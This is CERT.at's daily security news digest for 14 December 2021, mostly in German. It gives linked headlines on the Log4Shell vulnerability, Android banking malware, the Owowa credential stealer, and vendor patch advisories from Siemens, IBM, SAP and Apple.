[CERT-daily] Tageszusammenfassung - 14.12.2021

Daily end-of-shift report team at cert.at
Tue Dec 14 19:06:25 CET 2021 

=====================
= End-of-Day report =
=====================

Timeframe:   Montag 13-12-2021 18:00 − Dienstag 14-12-2021 18:00
Handler:     Thomas Pribitzer
Co-Handler:  Stephan Richter

=====================
=       News        =
=====================

*** News zu Log4j ***
---------------------------------------------
Log4j: List of vulnerable products and vendor advisories 
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/  
Log4J-Lücke: BSI gibt vorschnell Entwarnung für Verbraucher 
https://www.golem.de/news/log4j-luecke-bsi-gibt-vorschnell-entwarnung-fuer-verbraucher-2112-161797-rss.html  
Log4Shell Is Spawning Even Nastier Mutations 
https://threatpost.com/apache-log4j-log4shell-mutations/176962/  
Log4j: Getting ready for the long haul (CVE-2021-44228), (Tue, Dec 14th) 
https://isc.sans.edu/diary/rss/28130  
Log4j 2.16.0 verbessert Schutz vor Log4Shell-Lücke 
https://heise.de/-6294053  
Kommentar zu Log4j: Es funktioniert wie spezifiziert 
https://heise.de/-6294476  
GitHubs Antwort auf die kritische Log4j-Lücke 
https://heise.de/-6294120  
Security company offers Log4j vaccine for systems that cant be updated immediately 
https://www.zdnet.com/article/security-company-offers-log4j-vaccine-for-systems-that-cant-be-updated-immediately/  
CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228 
https://us-cert.cisa.gov/ncas/current-activity/2021/12/13/cisa-creates-webpage-apache-log4j-vulnerability-cve-2021-44228  
The numbers behind a cyber pandemic – detailed dive 
https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/  
Log4Shell (Log4j RCE): Detecting Post-Exploitation Evidence is Best Chance for Mitigation 
https://www.intezer.com/blog/cloud-security/log4shell-mitigation/  
Log4Shell log4j vulnerability (CVE-2021-44228) - cheat-sheet reference guide 
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/  
---------------------------------------------
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/


∗∗∗ Anubis Android malware returns to target 394 financial apps ∗∗∗
---------------------------------------------
The Anubis Android banking malware is now targeting the customers of nearly 400 financial institutions in a new malware campaign.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/anubis-android-malware-returns-to-target-394-financial-apps/


∗∗∗ Malware und Security: Microsoft bietet Analyse potenziell gefährlicher Treiber an ∗∗∗
---------------------------------------------
Mit Hilfe eines Formulars können Kunden Treiber zu Microsoft schicken. Die werden erst automatisiert und bei Bedarf von Menschen geprüft.
---------------------------------------------
https://www.golem.de/news/malware-und-security-microsoft-bietet-analyse-potenziell-gefaehrlicher-treiber-an-2112-161780-rss.html


∗∗∗ Owowa: the add-on that turns your OWA into a credential stealer and remote access panel ∗∗∗
---------------------------------------------
We found a suspicious binary and determined it as an IIS module, aimed at stealing credentials and enabling remote command execution from OWA.
---------------------------------------------
https://securelist.com/owowa-credential-stealer-and-remote-access/105219/


∗∗∗ How Malware Gets On Your Website ∗∗∗
---------------------------------------------
Almost since the Internet’s inception malware infections have kept pace to be the biggest nuisance a site owner experiences. With an ever growing amount of sites making up the World Wide Web, malware infections only become more common. In this article we’ll discuss what malware is, the various types we’ve come across, the methods used to inject malware into a site, and how you can harden/protect your site from these methods.
---------------------------------------------
https://blog.sucuri.net/2021/12/how-malware-gets-on-your-website.html


∗∗∗ Gefährliche Lücken in Server-Backupsoftware IBM Spectrum Protect geschlossen ∗∗∗
---------------------------------------------
Angreifer könnten Systeme mit IBM Spectrum Protect angreifen und im schlimmsten Fall Schadcode ausführen. Sicherheitsupdates sind verfügbar.
---------------------------------------------
https://heise.de/-6294287


∗∗∗ Patchday: Kritische Sicherheitslücken in SAP-Geschäftssoftware ∗∗∗
---------------------------------------------
15 Sicherheitslücken melden die Walldorfer zum Dezember-Patchday in ihrer Business-Software. Viel schätzt SAP als hohes oder gar kritisches Risiko ein.
---------------------------------------------
https://heise.de/-6294773


∗∗∗ Vorsicht, wenn Ihre Internetbekanntschaft um Geld bittet ∗∗∗
---------------------------------------------
Sie haben auf einer Dating-Plattform einen Mann kennengelernt? Er ist zuvorkommend, gutaussehend und noch dazu gebildet? Es gibt nur einen Haken: Er befindet sich gerade im Ausland. Mit Ihrer finanziellen Unterstützung steht einem baldigen Treffen aber nichts im Weg. Achtung: Sie sind an einen Love-Scammer geraten!
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-wenn-ihre-internetbekanntschaft-um-geld-bittet/


∗∗∗ Apple releases Android app to find rogue AirTags ∗∗∗
---------------------------------------------
Apple has released an Android app on Monday to help Android users detect malicious nearby AirTag devices that might be used to track them.
---------------------------------------------
https://therecord.media/apple-releases-android-app-to-find-malicious-airtags/



=====================
=  Vulnerabilities  =
=====================

*** Advisories zur Log4j-Schwachstelle ***
---------------------------------------------
SSA-661247: Apache Log4j Vulnerability (CVE-2021-44228, Log4Shell) - Impact to Siemens Products 
https://cert-portal.siemens.com/productcert/txt/ssa-661247.txt  
JSA11259 
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11259  
Vulnerability in Apache Log4j Library 
https://www.qnap.com/en-us/security-advisory/QSA-21-58  
Apache Log4j Vulnerability 
https://support.lenovo.com/product_security/PS500457-APACHE-LOG4J-VULNERABILITY  
Security Notice – Statement About Apache Log4j2 Remote Code Execution Vulnerability(CVE-2021-44228) 
https://www.huawei.com/en/psirt/security-notices/2021/huawei-sn-20211210-01-log4j2-en  
---------------------------------------------
https://www.huawei.com/en/psirt/security-notices/2021/huawei-sn-20211210-01-log4j2-en  


∗∗∗ Dell driver fix still allows Windows Kernel-level attacks ∗∗∗
---------------------------------------------
Dells driver fix of the CVE-2021-21551 vulnerability leaves margin for catastrophic BYOVD attacks resulting in Windows kernel driver code execution.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/dell-driver-fix-still-allows-windows-kernel-level-attacks/


∗∗∗ IBM Security Bulletins ∗∗∗
---------------------------------------------
Info about Log4Shell in IBM Products, Novalink, WebSphere Application Server, WebSphere MQ for HP NonStop Server, MQ for HP NonStop Server, Tivoli Netcool, Netezza Analytics, Netezza Host Management
---------------------------------------------
https://www.ibm.com/blogs/psirt/


∗∗∗ Schwere Sicherheitslücken in iOS und macOS: Apple-Updates bald einspielen ∗∗∗
---------------------------------------------
iOS 15.2 und macOS 12.1 beseitigen Schwachstellen, die unter anderem den Remote-Jailbreak erlaubten. Für ältere Systemversionen fehlen Patches teilweise.
---------------------------------------------
https://heise.de/-6294390


∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (libsamplerate and raptor2), Fedora (pam-u2f and python-markdown2), openSUSE (chromium, fetchmail, ImageMagick, and postgresql10), Oracle (samba), SUSE (fetchmail, postgresql10, python-pip, python3, and sles12sp2-docker-image), and Ubuntu (apache-log4j2, flatpak, glib, and samba).
---------------------------------------------
https://lwn.net/Articles/878629/


∗∗∗ Advantech R-SeeNet ∗∗∗
---------------------------------------------
This advisory contains mitigations for SQL Injection, and Improper Privilege Management vulnerabilities in the Advantech R-SeeNet monitoring application.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-21-348-01


∗∗∗ Schneider Electric Rack PDU ∗∗∗
---------------------------------------------
This advisory contains mitigations for a Cross-site Scripting vulnerability in Schneider Electric Rack Power Distribution Unit (PDU).
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-21-348-02


∗∗∗ K73710094: XSS vulnerability in undisclosed page of the NGINX Swagger UI ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K73710094


∗∗∗ ZDI-21-1536: Trend Micro Maximum Security Link Following Denial-of-Service Vulnerability ∗∗∗
---------------------------------------------
https://www.zerodayinitiative.com/advisories/ZDI-21-1536/


∗∗∗ ZDI-21-1535: McAfee Database Security Improper Access Control Denial-of-Service Vulnerability ∗∗∗
---------------------------------------------
https://www.zerodayinitiative.com/advisories/ZDI-21-1535/


*** Siemens Security Advisories ***
---------------------------------------------
SSA-496292: Remote Code Execution Vulnerability in POWER METER SICAM Q100 
https://cert-portal.siemens.com/productcert/txt/ssa-496292.txt  
SSA-463116: Multiple Access Control Vulnerabilities in Siveillance Identity before 
https://cert-portal.siemens.com/productcert/txt/ssa-463116.txt  
SSA-400332: Insufficient Design IP Protection in IEEE 1735 Recommended Practice - Impact to Questa and ModelSim 
https://cert-portal.siemens.com/productcert/txt/ssa-400332.txt  
SSA-396621: Multiple File Parsing Vulnerabilities in JTTK before V10.8.1.1 and JT Utilities before V12.8.1.1 
https://cert-portal.siemens.com/productcert/txt/ssa-396621.txt  
SSA-390195: LibVNC Vulnerabilities in SIMATIC ITC Products 
https://cert-portal.siemens.com/productcert/txt/ssa-390195.txt  
SSA-352143: Multiple File Parsing Vulnerabilities in JTTK before V11.0.3.0 and JT Utilities before V13.0.3.0 
https://cert-portal.siemens.com/productcert/txt/ssa-352143.txt  
SSA-199605: Arbitrary File Download Vulnerability in SIMATIC eaSie PCS 7 Skill Package 
https://cert-portal.siemens.com/productcert/txt/ssa-199605.txt  
SSA-161331: Scene File Parsing Vulnerability in Simcenter STAR-CCM+ Viewer before V2021.3.1 
https://cert-portal.siemens.com/productcert/txt/ssa-161331.txt  
SSA-160202: Multiple Access Control Vulnerabilities in SiPass Integrated 
https://cert-portal.siemens.com/productcert/txt/ssa-160202.txt  
SSA-133772: Zip Path Traversal Vulnerability in Teamcenter Active Workspace 
https://cert-portal.siemens.com/productcert/txt/ssa-133772.txt  
SSA-523250: Improper Certificate Validation Vulnerability in SINUMERIK Edge 
https://cert-portal.siemens.com/productcert/txt/ssa-523250.txt  
SSA-595101: Multiple File Parsing Vulnerabilities in JT2Go and Teamcenter Visualization before V13.2.0.5 
https://cert-portal.siemens.com/productcert/txt/ssa-595101.txt  
SSA-620288: Multiple Vulnerabilities (NUCLEUS:13) in CAPITAL VSTAR 
https://cert-portal.siemens.com/productcert/txt/ssa-620288.txt  
SSA-802578: Multiple File Parsing Vulnerabilities in JTTK before V11.1.1.0 and JT Utilities before V13.1.1.0 
https://cert-portal.siemens.com/productcert/txt/ssa-802578.txt  
---------------------------------------------
https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications

-- 
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

More information about the Daily mailing list